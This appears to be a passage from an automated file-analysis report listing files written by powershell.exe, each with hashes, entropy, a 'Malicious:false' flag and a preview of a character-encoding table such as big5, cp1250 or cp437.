                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):94389
                                                                                                                                                                                                                Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):98634
                                                                                                                                                                                                                Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cns11643, double-byte..D..2134 0 93..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00004E284E364E3F4E854E054E04518251965338536953B64E2A4E874E4951E2..4E464E8F4EBC4EBE516651E35204529C53B95902590A5B805DDB5E7A5E7F5EF4..5F505F515F61961D4E3C4E634E624EA351854EC54ECF4ECE4ECC518451865722..572351E45205529E529D52FD5300533A5C735346535D538653B7620953CC6C15..53CE57216C3F5E005F0C623762386534653565E04F0E738D4E974EE04F144EF1..4EE74EF74EE64F1D4F024F054F2256D8518B518C519951E55213520B52A60000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.3578844928761034
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CqHVBUlJvRj7SOVbusZhAMiZyi77q8ujr4z8tjsuVO6ys2K:JMlBVnrAMiwMm8ujr4z8emTys2K
                                                                                                                                                                                                                MD5:9568EDE60D3F917F1671F5A625A801C4
                                                                                                                                                                                                                SHA1:4F5B3308FE7F6845B46779DECF9B395E47AC7396
                                                                                                                                                                                                                SHA-256:E2991A6F7A7A4D8D3C4C97947298FD5BACB3EAA2F898CEE17F5E21A9861B9626
                                                                                                                                                                                                                SHA-512:9C32BE3E25FC2211CE91F7B9AE1F9EBA20071272BE2BBBA63A8B6E3CD6543C4C32CD62C4C4D153C94F5BE212E974A61EEFD70DDC005F1688D09D9D56E8E298A8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1250, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E2026202020210088203001602039015A0164017D0179..009020182019201C201D202220132014009821220161203A015B0165017E017A..00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B..00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300E40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.358948900439905
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CTHVBUlJvRj7SOVbusZhAMiZyi77qpREwKsF/+++SAJlz9aRme3cJI:wMlBVnrAMiwMmpKwKm/EYnsJI
                                                                                                                                                                                                                MD5:83DAF47FD1F87B7B1E9E086F14C39E5B
                                                                                                                                                                                                                SHA1:77AE330512EBFEF430A02213644BD1CFCE174298
                                                                                                                                                                                                                SHA-256:0AA66DFF8A7AE570FEE83A803F8F5391D9F0C9BD6311796592D9B6E8E36BE6FC
                                                                                                                                                                                                                SHA-512:D7CE2F44EDFE1DA6D3E07E9A41BB08AD42430BAAFADD09FD217F4B524323A01A1F4913B640C552D38AAEBFF75B0D50ED7A813A2A57C4019311158890C0162DF9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1251, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..04020403201A0453201E20262020202120AC203004092039040A040C040B040F..045220182019201C201D202220132014009821220459203A045A045C045B045F..00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407..00B000B104060456049100B500B600B704512116045400BB0458040504550457..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..043004310432043304340
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.292994562910468
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:C4HVBUlJvRj7SOVbusZhAMiZyi77qdmV/rcwvGNNlkL+rSMH+tKv:rMlBVnrAMiwMmd2r/okLz0
                                                                                                                                                                                                                MD5:E9117326C06FEE02C478027CB625C7D8
                                                                                                                                                                                                                SHA1:2ED4092D573289925A5B71625CF43CC82B901DAF
                                                                                                                                                                                                                SHA-256:741859CF238C3A63BBB20EC6ED51E46451372BB221CFFF438297D261D0561C2E
                                                                                                                                                                                                                SHA-512:D0A39BC41ADC32F2F20B1A0EBAD33BF48DFA6ED5CC1D8F92700CDD431DB6C794C09D9F08BB5709B394ACF54116C3A1E060E2ABCC6B503E1501F8364D3EEBCD52
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1252, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D017D008F..009020182019201C201D20222013201402DC21220161203A0153009D017E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300E40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.422723556981327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CRHVBUlJvRj7SOVbusZhAMiZyi77qduWn4T5K9QQSqiWeIDDdn:CMlBVnrAMiwMmduWnSKyQSqiWeIVn
                                                                                                                                                                                                                MD5:441B86A0DE77F25C91DF1CD4685F651D
                                                                                                                                                                                                                SHA1:D1E429916BC9423F55EEC8F17941521E9FE9D32B
                                                                                                                                                                                                                SHA-256:5B8D47451F847C1BDE12CACA3739CA29860553C0B6399EE990D51B26F9A69722
                                                                                                                                                                                                                SHA-512:35DF342DDA4E8790C6D53762465DF8B93B49B7B7E211D7A5753078EF559C9C9383EFF7285A90FF5C0020FBB16AF380EE3C8643F4CEB1E41917E72021079D722F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1253, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202100882030008A2039008C008D008E008F..009020182019201C201D20222013201400982122009A203A009C009D009E009F..00A00385038600A300A400A500A600A700A800A9000000AB00AC00AD00AE2015..00B000B100B200B3038400B500B600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303B40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.307590929679485
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CWHVBUlJvRj7SOVbusZhAMiZyi77qdjrcFvGNNlkBSMH+tA/b:lMlBVnrAMiwMmdjriokgzAD
                                                                                                                                                                                                                MD5:5FA9162BEC5A4DEA97B5EA2840CFB065
                                                                                                                                                                                                                SHA1:F26858E3D2FB928F39CA87CBB8446AF099570CAD
                                                                                                                                                                                                                SHA-256:31639CA96A4D3602D59BD012540FE179917E0561CB11A0D0B61F1B950EB76911
                                                                                                                                                                                                                SHA-512:3CE7BEABBE1A0CB946149D263D3317A8B791F6D72C49DEC4621E27F50CC359D8FA3EE97C03FF05D44E47DAA59DB87F219386467614B8B3FF8CC21AB3E3BED5E6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1254, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D008E008F..009020182019201C201D20222013201402DC21220161203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300E40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.3385880810272774
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CfHVBUlJvRj7SOVbusZhAMiZyi77qdIn2hEeGlRhv6Mw6Kcv:MMlBVnrAMiwMmdInSEdhvrj7
                                                                                                                                                                                                                MD5:6DEA4179969D6C81C66C3B0F91B39769
                                                                                                                                                                                                                SHA1:7E2722576BFFABC3258C5EDB2D99FA2468D6A4B0
                                                                                                                                                                                                                SHA-256:47576CAE321C80E69C7F35205639680BF28010111E86E228ED191B084FAC6B91
                                                                                                                                                                                                                SHA-512:91CC626B6454517F06FB3616E9ED623D1A2A4BFE74AFA9885F00F6AEC835D8825A5587091B9D9AB0E5ABDA291FA3FE7CE87E2618E21EB2974D9118AE27B8A2FF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1255, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A2039008C008D008E008F..009020182019201C201D20222013201402DC2122009A203A009C009D009E009F..00A000A100A200A320AA00A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE00BF..05B005B105B205B305B405B505B605B705B805B9000005BB05BC05BD05BE05BF..05C005C105C205C305F005F105F205F305F40000000000000000000000000000..05D005D105D205D305D40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.4033510023542655
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:C0HVBUlJvRj7SOVbusZhAMiZyi77q30pPE7Lym4cwGm+AMZjyG/JQIG/Y:XMlBVnrAMiwMm30FQLym4ys6Jg/Y
                                                                                                                                                                                                                MD5:D50DFAFEE5C605C5C00A25A9EEE4D4CF
                                                                                                                                                                                                                SHA1:7D51BC17931D3D809716C06E7F07C6011286A144
                                                                                                                                                                                                                SHA-256:29340EA8E5AD3532BF67FA77CC852F055081B1238925CB109908AA72804CCC04
                                                                                                                                                                                                                SHA-512:D0A9B422A1061D6239E442767069B987E33239FCBA9BACE677923888F5F8BD1DCAABC71B83A985A0A86A15DCC44316781665BBFBF24558FCB94FDA6783285BCB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1256, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC067E201A0192201E20262020202102C62030067920390152068606980688..06AF20182019201C201D20222013201406A921220691203A0153200C200D06BA..00A0060C00A200A300A400A500A600A700A800A906BE00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B9061B00BB00BC00BD00BE061F..06C1062106220623062406250626062706280629062A062B062C062D062E062F..063006310632063306340635063600D7063706380639063A0640064106420643..00E0064400E2064506460
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.344584404753015
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CNHVBUlJvRj7SOVbusZhAMiZyi77q8uWTfNL4wIBUioGndt:uMlBVnrAMiwMm8uWJDNIt
                                                                                                                                                                                                                MD5:CC3D24543FDD4644BBBD4AAB30CA71BC
                                                                                                                                                                                                                SHA1:8E2658E7F782F005411BCB8423BDFC3C68BDED14
                                                                                                                                                                                                                SHA-256:C15AB85438728BF2C60D72B1A66AF80E8B1CE3CF5EB08BA6421FF1B2F73ACDF4
                                                                                                                                                                                                                SHA-512:5ECABF820098F7D24AB806ADD9CA3E1087C29914FB2DE6BA3DC656234202DE3FDF80A7E9ED433CCB2149FF07184F74884CEB37A1B689E9E0C1402916F3E13AFE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1257, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E20262020202100882030008A2039008C00A802C700B8..009020182019201C201D20222013201400982122009A203A009C00AF02DB009F..00A0000000A200A300A4000000A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B300B400B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F0101010700E40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1111
                                                                                                                                                                                                                Entropy (8bit):3.2984943182702593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CKlHVBUlJvRj7SOVbusZhAMiZyi77qdIQ2jFvGNNykoxWi3/i:xMlBVnrAMiwMmdIQufkoxn3q
                                                                                                                                                                                                                MD5:12BCEAE6B6A5FAE5AE9C42F5998BA485
                                                                                                                                                                                                                SHA1:C9620DA0C763D2C3770386E69EE7E421BD1BA965
                                                                                                                                                                                                                SHA-256:29D93DEE7C01B2264778BC6B75F6EF76EA6AC53E9F4A334D83707229E7F482D2
                                                                                                                                                                                                                SHA-512:714BAF58462FB0E84A32D82C8FC2D63EDF78DF8CCE578391E2521737F94F860B5CCFE41B481E1D09879A6811FCFD8B98A2724DB1D15749BD5293A9B33BCAD071
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp1258, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A20390152008D008E008F..009020182019201C201D20222013201402DC2122009A203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C2010200C400C500C600C700C800C900CA00CB030000CD00CE00CF..011000D1030900D300D401A000D600D700D800D900DA00DB00DC01AF030300DF..00E000E100E2010300E40
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.515546664597914
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CFyHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBIqE18wDyV8mK:wyMlBVnrAMiwMm+VhE1LmK
                                                                                                                                                                                                                MD5:CE6D8A6542DC12D1783084FA4B2B63EA
                                                                                                                                                                                                                SHA1:5039A350C8E3E2C6F353B438B41BD0B6A7AB8069
                                                                                                                                                                                                                SHA-256:E5613C04D3D2EE44CCAD85AE53A37C257674491C540836E5D942BBCC4E4A8DB4
                                                                                                                                                                                                                SHA-512:E8C5CFB747486BBE0E567B6E87B59D5246D749A80C8F64F6669227C7FD849886F98A1F94451922AC099409AC14890F1A8B1E5F25EA584FDB1522ACE3AD0BE6A6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp437, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.6177058818384693
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CjHVBUlJvRj7SOVbusZhAMiZyi77qSKOQFhWehDrq18wDyVKockoiH:WMlBVnrAMiwMmSKOQFhWeh3q1odH
                                                                                                                                                                                                                MD5:8EF3CBCA101F5777846D12D3C96A0A7D
                                                                                                                                                                                                                SHA1:5EC5418B861894E0F18EA15AA4414019815E2EA2
                                                                                                                                                                                                                SHA-256:A0415F14F5D72AD24E9C3A5C91517A0E3D22E1ADBC3505C0C6E918B961F7A07D
                                                                                                                                                                                                                SHA-512:FB14C88E61E5459B4A8706751D88D0A261AC6B4171F72912D87CE78A2BC97A821CCF5B53676FB229C08F9E557BE624F4DC649B722A906B9B7944ED2D5E7F9065
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp737, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..039103920393039403950396039703980399039A039B039C039D039E039F03A0..03A103A303A403A503A603A703A803A903B103B203B303B403B503B603B703B8..03B903BA03BB03BC03BD03BE03BF03C003C103C303C203C403C503C603C703C8..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03C903AC03AD03AE03CA03
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.451057608106102
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CsOHVBUlJvRj7SOVbusZhAMiZyi77qoo9ecL067J4ZNUPVw3PfA:AMlBVnrAMiwMm59T067KDLPo
                                                                                                                                                                                                                MD5:9656761FA02EA24773EAD3E5C4BDB975
                                                                                                                                                                                                                SHA1:366228F25392708FA799E9CC0830CE9917EF6CA7
                                                                                                                                                                                                                SHA-256:C3C6542E902DEC2C44DDCFD8B5CB7ABF309B0413A7CED1614DC0B20CF7C5E35F
                                                                                                                                                                                                                SHA-512:A6A44B9A2193D75764DC284BE53264E57BFEB2A221FD54B4577DD90752F69A45E6B9D293108A7AB895F347A24FD10AAE84954A043AB1F466F485D707D7412380
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp775, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..010600FC00E9010100E4012300E501070142011301560157012B017900C400C5..00C900E600C6014D00F6012200A2015A015B00D600DC00F800A300D800D700A4..0100012A00F3017B017C017A201D00A600A900AE00AC00BD00BC014100AB00BB..259125922593250225240104010C01180116256325512557255D012E01602510..25142534252C251C2500253C0172016A255A25542569256625602550256C017D..0105010D01190117012F01610173016B017E2518250C25882584258C25902580..00D300DF014C014300F500
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.3718781469586827
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:C9HVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBc+myS5LeQDTVwA:EMlBVnrAMiwMm+VeyS5SQn/
                                                                                                                                                                                                                MD5:2169EE726DCC011E6C3505D586C88FC3
                                                                                                                                                                                                                SHA1:094252AD0634787E2D7F0D28A448437054D359C7
                                                                                                                                                                                                                SHA-256:13DF611F429A9B331DA1B34F3C718CCCAF0BD4AB44F71A9C632197987B4D643B
                                                                                                                                                                                                                SHA-512:BC5831EF1C131095A22C76FFCB5C4217081AF796B60455BE2DE2E2689CFE1033F07E8B45449F77E7804A7D52CBCFB916B0B4639828E65B14475BB3367F47C8EE
                                                                                                                                                                                                                Malicious:false
